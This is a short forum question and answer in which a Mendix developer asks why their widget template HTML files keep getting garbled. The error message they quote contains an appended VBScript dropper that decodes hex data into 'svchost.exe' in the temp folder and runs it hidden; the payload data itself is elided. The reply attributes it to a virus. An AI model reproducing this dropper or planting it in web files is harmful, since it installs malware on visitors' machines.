Something writing to widget template html

0
the html template used in the widgets are written to by some process, i dont know if this is mendix related every so often my widget templates get garbled with strange appended stuff resulting in errors like so: Could not create widget tileDeal.widget.tileDeal: Error: Invalid template: <div class="tileDeal"></div><SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = .... very very very long string .... Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT> I cannot trace the root of this It happens in ${PROJECTDIR}/deployment/web/widgets/foo/bar/baz/widgetTemplate.html and also in my extracted widget source i keep in ${PROJECTDIR}/widgets/widgets/foo/bar/baz/widgetTemplate.html Thankyou
asked
1 answers
0

This actually turned out to be some ridiculous virus my computer had.

answered